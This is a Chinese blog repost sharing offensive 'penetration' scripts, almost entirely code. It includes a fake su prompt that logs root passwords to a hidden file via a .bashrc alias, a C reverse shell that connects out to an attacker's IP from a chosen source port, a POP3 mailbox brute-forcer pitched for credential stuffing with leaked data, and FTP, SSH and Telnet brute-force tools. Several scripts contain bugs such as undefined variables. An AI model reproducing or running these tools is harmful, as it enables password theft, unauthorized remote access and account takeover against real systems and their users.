[91ri]渗透用的Python小脚本
2024-05-21 18:18:24
0x00
渗透的很多时候,找到的工具并不适用,自己码代码才是王道,下面三个程序都是渗透时在网络上找不到合适工具,自己辛苦开发的,短小使用,求欣赏,求好评。
0x01
记录root密码小工具
root.py
1 #!/usr/bin/python
2 import os, sys, getpass, time
3
4 current_time = time.strftime("%Y-%m-%d %H:%M")
5 logfile="/dev/shm/.su.log" //密码获取后记录在这里
6 #CentOS
7 #fail_str = "su: incorrect password"
8 #Ubuntu
9 #fail_str = "su: Authentication failure"
10 #For Linux Korea //centos,ubuntu,korea 切换root用户失败提示不一样
11 fail_str = "su: incorrect password"
12 try:
13 passwd = getpass.getpass(prompt='Password: ');
14 file=open(logfile,'a')
15 file.write("[%s]t%s"%(passwd, current_time)) //截取root密码
16 file.write('n')
17 file.close()
18 except:
19 pass
20 time.sleep(1)
21 print fail_str //打印切换root失败提示渗透linux拿到低权限并提权无果时,将这个程序传上去,再将一个低权限用户目录下的.bashrc添加一句alias su=’/usr/root.py'; 低权限用户su root 后 成功记录密码。密码记录路径请看脚本
0x02
设置源端口反弹shell
渗透某个linux服务器,反连时目标端口为888不行,53,80还是不行,
Ping了下百度 可以ping通,
那真相只有一个
服务器变态的限制了只能某些提供已某些端口为源端口去连接外面
比如
只允许接收对80端口的访问数据包,并以80为源端口向外回复数据。
谷歌程序无果,自己查了相关api后写了个。
client-port.c
1 #include <stdio.h>
2 #include <sys/types.h>
3 #include <sys/socket.h>
4 #include <netinet/in.h>
5 #include <netdb.h>
6 void error(char *msg)
7 {
8 perror(msg);
9 exit(0);
10 }
11 int main(int argc, char *argv[])
12 {
13 int sockfd, portno, lportno,n;
14 struct sockaddr_in serv_addr;
15 struct sockaddr_in client_addr;
16 struct hostent *server;
17 char buffer[256];
18 if (argc < 3) {
19 fprintf(stderr,"usage %s hostname port LocalPortn", argv[0]);
20 exit(0);
21 } //三个参数,目标主机,目标主机端口,本地源端口
22 portno = atoi(argv[2]);
23 sockfd = socket(AF_INET, SOCK_STREAM, 0);
24 if (sockfd < 0)
25 error("ERROR opening socket");
26
27
28 bzero((char *) &client_addr, sizeof(client_addr));
29 lportno = atoi(argv[3]);
30 client_addr.sin_family = AF_INET;
31 client_addr.sin_addr.s_addr = INADDR_ANY;
32 client_addr.sin_port = htons(lportno); //设置源端口
33 if (bind(sockfd, (struct sockaddr *) &client_addr,
34 sizeof(client_addr)) < 0)
35 error("ERROR on binding");
36
37 server = gethostbyname(argv[1]);
38 if (server == NULL) {
39 fprintf(stderr,"ERROR, no such host ");
40 exit(0);
41 }
42 bzero((char *) &serv_addr, sizeof(serv_addr));
43 serv_addr.sin_family = AF_INET;
44 bcopy((char *)server->h_addr,
45 (char *)&serv_addr.sin_addr.s_addr,
46 server->h_length);
47 serv_addr.sin_port = htons(portno);
48 if (connect(sockfd,&serv_addr,sizeof(serv_addr)) < 0) //连接
49 error("ERROR connecting");
50 dup2(fd, 0);
51 dup2(fd, 1);
52 dup2(fd, 2);
53 execl("/bin/sh","sh -i", NULL); //执行shell
54 close(fd);
55 }用法:
1 gcc client-port.c -o port
1 chmod +x port
1 ./port 你的IP 你的监听端口 本地的源端口
如 ./port http://www.91ri.org 80 80
成功反弹shell 提权成功
0x03 邮箱爆破脚本
某个时候 需要爆破一批邮箱
Burp163.pl
1 #!/usr/bin/perl
2 use Net::POP3;
3 $email="pop.163.com"; //设置pop服务器地址 qq为pop.qq.com
4 $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");
5 print $pop->banner();
6 $pop->quit;
7 $i=0;
8 open(fp1,"user.txt");
9 @array1=<fp1>;
10 open(fp2,"pass.txt");
11 @array2=<fp2>; //从文件中获取邮箱用户名及密码
12 foreach $a(@array1) {
13 $u=substr($a,0,length($a)-1);
14 $u=$u."@163.com";
15 foreach $b(@array2) {
16 $p=substr($b,0,length($b)-1);
17 print "cracked with ".$u."-----".$p."n";
18 $i=$i+1;
19 $pop = Net::POP3->new($email)or die("ERROR: Unable to initiate. ");
20 $m=$pop->login($u,$p); //尝试登录邮箱
21 if($m>0)
22 {
23 print $u."------------".$p."----"."success"."n";
24 $pop->quit;
25 } //成功登录
26 else
27 {
28 print $u."------------".$p."----"."failed"."n";
29 $pop->quit; //登录失败
30 }
31 }
32 }
33 print $i;用法 将要爆破的邮箱的pop服务器写入下面这一行 默认是163邮箱
1 $email="pop.163.com";
再将去除掉@后面部分的邮箱地址比如lusiyu@163.com 去除后lusiyu存进去
同目录user.txt中吗,再将字典存进去pass.txt
你会说
这个有点鸡肋吧 万一邮箱的密码很复杂
呵呵
搞到了一个小站的数据,
用这个程序批量测试密码是否就是邮箱密码 呵呵
我啥都没说。
0x04
这三个程序仅供技术研究,如读者用于违法行为,本人概不负责。
在渗透测试当中,免不了要进行密码破解。http://www.91ri.org/8696.html
0x01
FTP暴力破解脚本
1 #!/usr/bin/env python
2 #-*-coding = utf-8-*-
3 #author:@xfk
4 #blog:@blog.sina.com.cn/kaiyongdeng
5 #date:@2012-05-08
6
7 import sys, os, time
8 from ftplib import FTP
9 docs = """
10 [*] This was written for educational purpose and pentest only. Use it at your own risk.
11 [*] Author will be not responsible for any damage!
12 [*] Toolname : ftp_bf.py
13 [*] Coder :
14 [*] Version : 0.1
15 [*] eample of use : python ftp_bf.py -t ftp.server.com -u usernames.txt -p passwords.txt
16 """
17
18 if sys.platform == 'linux' or sys.platform == 'linux2':
19 clearing = 'clear'
20 else:
21 clearing = 'cls'
22 os.system(clearing)
23 R = "\033[31m";
24 G = "\033[32m";
25 Y = "\033[33m"
26 END = "\033[0m"
27 def logo():
28 print G+"\n |---------------------------------------------------------------|"
29 print " | |"
30 print " | blog.sina.com.cn/kaiyongdeng |"
31 print " | 08/05/2012 ftp_bf.py v.0.1 |"
32 print " | FTP Brute Forcing Tool |"
33 print " | |"
34 print " |---------------------------------------------------------------|\n"
35 print " \n [-] %s\n" % time.strftime("%X")
36 print docs+END
37
38 def help():
39 print R+"[*]-t, --target ip/hostname <> Our target"
40 print "[*]-u, --usernamelist usernamelist <> usernamelist path"
41 print "[*]-p, --passwordlist passwordlist <> passwordlist path"
42 print "[*]-h, --help help <> print this help"
43 print "[*]Example : python ftp_bf -t ftp.server.com -u username.txt -p passwords.txt"+END sys.exit(1)
44
45 def bf_login(hostname,username,password):
46 # sys.stdout.write("\r[!]Checking : %s " % (p))
47 # sys.stdout.flush()
48 try:
49 ftp = FTP(hostname)
50 ftp.login(hostname,username, password)
51 ftp.retrlines('list')
52 ftp.quit()
53 print Y+"\n[!] w00t,w00t!!! We did it ! "
54 print "[+] Target : ",hostname, ""
55 print "[+] User : ",username, ""
56 print "[+] Password : ",password, ""+END
57 return 1
58 # sys.exit(1)
59 except Exception, e:
60 pass except KeyboardInterrupt: print R+"\n[-] Exiting ...\n"+END
61 sys.exit(1)
62
63 def anon_login(hostname):
64 try:
65 print G+"\n[!] Checking for anonymous login.\n"+END
66 ftp = FTP(hostname) ftp.login()
67 ftp.retrlines('LIST')
68 print Y+"\n[!] w00t,w00t!!! Anonymous login successfuly !\n"+END
69 ftp.quit()
70 except Exception, e:
71 print R+"\n[-] Anonymous login failed...\n"+END
72 pass
73
74 def main():
75 logo()
76 try:
77 for arg in sys.argv:
78 if arg.lower() == '-t' or arg.lower() == '--target':
79 hostname = sys.argv[int(sys.argv[1:].index(arg))+2]
80 elif arg.lower() == '-u' or arg.lower() == '--usernamelist':
81 usernamelist = sys.argv[int(sys.argv[1:].index(arg))+2]
82 elif arg.lower() == '-p' or arg.lower() == '--passwordlist':
83 passwordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
84 elif arg.lower() == '-h' or arg.lower() == '--help':
85 help()
86 elif len(sys.argv) <= 1:
87 help()
88 except:
89 print R+"[-]Cheak your parametars input\n"+END
90 help()
91
92 print G+"[!] BruteForcing target ..."+END
93 anon_login(hostname)
94 # print "here is ok"
95 # print hostname
96 try:
97 usernames = open(usernamelist, "r")
98 user = usernames.readlines()
99 count1 = 0
100 while count1 < len(user):
101 user[count1] = user[count1].strip()
102 count1 +=1
103 except:
104 print R+"\n[-] Cheak your usernamelist path\n"+END
105 sys.exit(1)
106
107 # print "here is ok ",usernamelist,passwordlist
108 try:
109 passwords = open(passwordlist, "r")
110 pwd = passwords.readlines()
111 count2 = 0
112 while count2 < len(pwd):
113 pwd[count2] = pwd[count2].strip()
114 count2 +=1
115 except:
116 print R+"\n[-] Check your passwordlist path\n"+END
117 sys.exit(1)
118
119 print G+"\n[+] Loaded:",len(user),"usernames"
120 print "\n[+] Loaded:",len(pwd),"passwords"
121 print "[+] Target:",hostname
122 print "[+] Guessing...\n"+END
123 for u in user: for p in pwd:
124 result = bf_login(hostname,u.replace("\n",""),p.replace("\n",""))
125 if result != 1:
126 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + R+"Disenable"+END
127 else:
128 print G+"[+]Attempt uaername:%s password:%s..." % (u,p) + Y+"Enable"+END
129 if not result :
130 print R+"\n[-]There is no username ans password enabled in the list."
131 print "[-]Exiting...\n"+END
132
133 if __name__ == "__main__":
134 main()0x02
SSH暴力破解
1 #!/usr/bin/env python
2 #-*-coding = UTF-8-*-
3 #author@:dengyongkai
4 #blog@:blog.sina.com.cn/kaiyongdeng
5
6
7 import sys
8 import os
9 import time
10 #from threading import Thread
11
12 try:
13 from paramiko import SSHClient
14 from paramiko import AutoAddPolicy
15 except ImportError:
16 print G+'''
17 You need paramiko module.
18 http://www.lag.net/paramiko/
19 Debian/Ubuntu: sudo apt-get install aptitude
20 : sudo aptitude install python-paramiko\n'''+END
21 sys.exit(1)
22
23 docs = """
24 [*] This was written for educational purpose and pentest only. Use it at your own risk.
25 [*] Author will be not responsible for any damage!
26 [*] Toolname : ssh_bf.py
27 [*] Author : xfk
28 [*] Version : v.0.2
29 [*] Example of use : python ssh_bf.py [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]
30 """
31
32
33 if sys.platform == 'linux' or sys.platform == 'linux2':
34 clearing = 'clear'
35 else:
36 clearing = 'cls'
37 os.system(clearing)
38
39
40 R = "\033[31m";
41 G = "\033[32m";
42 Y = "\033[33m"
43 END = "\033[0m"
44
45
46 def logo():
47 print G+"\n |---------------------------------------------------------------|"
48 print " | |"
49 print " | blog.sina.com.cn/kaiyongdeng |"
50 print " | 16/05/2012 ssh_bf.py v.0.2 |"
51 print " | SSH Brute Forcing Tool |"
52 print " | |"
53 print " |---------------------------------------------------------------|\n"
54 print " \n [-] %s\n" % time.ctime()
55 print docs+END
56
57
58 def help():
59 print Y+" [*]-H --hostname/ip <>the target hostname or ip address"
60 print " [*]-P --port <>the ssh service port(default is 22)"
61 print " [*]-U --usernamelist <>usernames list file"
62 print " [*]-P --passwordlist <>passwords list file"
63 print " [*]-H --help <>show help information"
64 print " [*]Usage:python %s [-T target] [-P port] [-U userslist] [-W wordlist] [-H help]"+END
65 sys.exit(1)
66
67 def BruteForce(hostname,port,username,password):
68 '''
69 Create SSH connection to target
70 '''
71 ssh = SSHClient()
72 ssh.set_missing_host_key_policy(AutoAddPolicy())
73 try:
74 ssh.connect(hostname, port, username, password, pkey=None, timeout = None, allow_agent=False, look_for_keys=False)
75 status = 'ok'
76 ssh.close()
77 except Exception, e:
78 status = 'error'
79 pass
80 return status
81
82
83 def makelist(file):
84 '''
85 Make usernames and passwords lists
86 '''
87 items = []
88
89 try:
90 fd = open(file, 'r')
91 except IOError:
92 print R+'unable to read file \'%s\'' % file+END
93 pass
94
95 except Exception, e:
96 print R+'unknown error'+END
97 pass
98
99 for line in fd.readlines():
100 item = line.replace('\n', '').replace('\r', '')
101 items.append(item)
102 fd.close()
103 return items
104
105 def main():
106 logo()
107 # print "hello wold"
108 try:
109 for arg in sys.argv:
110 if arg.lower() == '-t' or arg.lower() == '--target':
111 hostname = str(sys.argv[int(sys.argv[1:].index(arg))+2])
112 if arg.lower() == '-p' or arg.lower() == '--port':
113 port = sys.argv[int(sys.argv[1:].index(arg))+2]
114 elif arg.lower() == '-u' or arg.lower() == '--userlist':
115 userlist = sys.argv[int(sys.argv[1:].index(arg))+2]
116 elif arg.lower() == '-w' or arg.lower() == '--wordlist':
117 wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
118 elif arg.lower() == '-h' or arg.lower() == '--help':
119 help()
120 elif len(sys.argv) <= 1:
121 help()
122 except:
123 print R+"[-]Cheak your parametars input\n"+END
124 help()
125 print G+"\n[!] BruteForcing target ...\n"+END
126 # print "here is ok"
127 # print hostname,port,wordlist,userlist
128 usernamelist = makelist(userlist)
129 passwordlist = makelist(wordlist)
130
131 print Y+"[*] SSH Brute Force Praparing."
132 print "[*] %s user(s) loaded." % str(len(usernamelist))
133 print "[*] %s password(s) loaded." % str(len(passwordlist))
134 print "[*] Brute Force Is Starting......."+END
135 try:
136 for username in usernamelist:
137 for password in passwordlist:
138 print G+"\n[+]Attempt uaername:%s password:%s..." % (username,password)+END
139 current = BruteForce(hostname, port, username, password)
140 if current == 'error':
141 print R+"[-]O*O The username:%s and password:%s Is Disenbabled...\n" % (username,password)+END
142 # pass
143 else:
144 print G+"\n[+] ^-^ HaHa,We Got It!!!"
145 print "[+] username: %s" % username
146 print "[+] password: %s\n" % password+END
147 # sys.exit(0)
148 except:
149 print R+"\n[-] There Is Something Wrong,Pleace Cheak It."
150 print "[-] Exitting.....\n"+END
151 raise
152 print Y+"[+] Done.^-^\n"+END
153 sys.exit(0)
154
155
156 if __name__ == "__main__":
157 main()0x03
TELNET密码暴力破解
1 #!usr/bin/python
2 #Telnet Brute Forcer
3 #http://www.darkc0de.com
4 #d3hydr8[at]gmail[dot]com
5
6 import threading, time, random, sys, telnetlib
7 from copy import copy
8
9 if len(sys.argv) !=4:
10 print "Usage: ./telnetbrute.py <server> <userlist> <wordlist>"
11 sys.exit(1)
12
13 try:
14 users = open(sys.argv[2], "r").readlines()
15 except(IOError):
16 print "Error: Check your userlist path\n"
17 sys.exit(1)
18
19 try:
20 words = open(sys.argv[3], "r").readlines()
21 except(IOError):
22 print "Error: Check your wordlist path\n"
23 sys.exit(1)
24
25 print "\n\t d3hydr8[at]gmail[dot]com TelnetBruteForcer v1.0"
26 print "\t--------------------------------------------------\n"
27 print "[+] Server:",sys.argv[1]
28 print "[+] Users Loaded:",len(users)
29 print "[+] Words Loaded:",len(words),"\n"
30
31 wordlist = copy(words)
32
33 def reloader():
34 for word in wordlist:
35 words.append(word)
36
37 def getword():
38 lock = threading.Lock()
39 lock.acquire()
40 if len(words) != 0:
41 value = random.sample(words, 1)
42 words.remove(value[0])
43
44 else:
45 print "\nReloading Wordlist - Changing User\n"
46 reloader()
47 value = random.sample(words, 1)
48 users.remove(users[0])
49
50 lock.release()
51 if len(users) ==1:
52 return value[0][:-1], users[0]
53 else:
54 return value[0][:-1], users[0][:-1]
55
56 class Worker(threading.Thread):
57
58 def run(self):
59 value, user = getword()
60 try:
61 print "-"*12
62 print "User:",user,"Password:",value
63 tn = telnetlib.Telnet(sys.argv[1])
64 tn.read_until("login: ")
65 tn.write(user + "\n")
66 if password:
67 tn.read_until("Password: ")
68 tn.write(value + "\n")
69 tn.write("ls\n")
70 tn.write("exit\n")
71 print tn.read_all()
72 print "\t\nLogin successful:",value, user
73 tn.close()
74 work.join()
75 sys.exit(2)
76 except:
77 pass
78
79 for I in range(len(words)*len(users)):
80 work = Worker()
81 work.start()
82 time.sleep(1)转载于:https://www.cnblogs.com/btlulu/articles/4001174.html
[91ri]渗透用的Python小脚本相关推荐
- 根据sitemap一键推送给百度收录的python小脚本
欢迎关注原创视频教程 Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.c ...
- 分享一个刷网页PV的python小脚本
学习Python之余,分享一个用来刷网页PV的Python小脚本..... [root@huanqiu ~]# cat www.py #!/usr/bin/python # coding: UTF-8 ...
- linux命令行下查看ip归属地Python小脚本
2019独角兽企业重金招聘Python工程师标准>>> <p style="margin: 0px 0px 15px; padding: 0px; border: 0 ...
- 【python小脚本】从数据库获取文件路径通过scp下载本地
写在前面 我的需求 需要在mysql数据库中查到相关文件的在服务器的路径,然后通过scp来下载相关文件,之前是手动操作,我现在要写成一个脚本 我需要解决的问题 如何使用python连接mysql数据库 ...
- 【Python小脚本】实现王者农药自动刷金币啦~啦啦啦走跟我一起组队~
前言
- ffmpeg剪切视频的python小脚本
# -*- coding: utf-8 -*- """ 用于剪切视频 input_video后面填写输入的视频文件名路径 start_time后面填写剪切视频的开始时间( ...
- 【Python小脚本】1分钟100完成100题,某脚本python根据题库选择答案,准确率100%,真的牛了(超级赞)源码可分享,亲测好用~
导语 对于新手而言,掌握好方向盘的打法非常重要,关系到我们能否顺利通过驾考,拿到驾照.而 开车时方向盘又是最重要的,握好方向盘等于是给自己的安全上了保险. 所有文章完整的素材+源码都在
- 维吉尼亚密码 php,python小脚本之维吉尼亚密码
维吉尼亚作为古典密码,本身的加解密并不是很难,因此也就有了这篇文章~ 下面初步解释下维吉尼亚密码的加密原理,假设现在有明文'a',加密密钥为'b',然后我们参照上面的维吉尼亚密码表进行加密,在a行的b ...
- 记录一些python小脚本
1.提取文件里的关键字 def openreadtxt(file_name):data = []file = open(file_name,'r',encoding="utf-8" ...
- python爬虫脚本ie=utf-8_分享一个Python爬虫小脚本
此Python小脚本为抓取此页面:http://tieba.baidu.com/p/2108681777 下的所有jpg图像 ''' Created on 2013-4-2 @author: Admi ...
最新文章
- HDU 2157 How many ways?? 临接矩阵+快速幂
- tensorflow 迁移学习_基于 TensorFlow.js 1.5 的迁移学习图像分类器
- 还是畅通工程(1233 并查集+kruskal)
- 关于readdir返回值中struct dirent.d_type的取值有关问题(转)
- java 抛出异常 返回值_java通过抛异常来返回提示信息
- Scala基于Akka模拟Spark Master Worker进程间通信(二):Worker定时向Master心跳
- 使用 Python 获取 Linux 系统信息的代码
- spring + hibernate + mysql 事务不回滚
- 获取数组中的最大、最小值
- Python socket non-blocking with SSL 的问题
- javascript中引号嵌套
- Visual Studio 201~ Code 格式检查
- 阿里云数据盘分区并挂载
- 如何将自制的live2d模型上传至facerig创意工坊使得别人可以下载
- 用C#调用Matlab图像处理自制QQ游戏2D桌球瞄准器
- 驾驶本到期换新,要想照片拍的好看,办理不耽误时间请按照以下步骤进行
- cbrt函数_cbrt()函数以及C ++中的示例
- GPIO实现I2C从机的设计[1]
- 满足于一种廉价的幸福?
- ECCV2018论文,以及相关比赛地址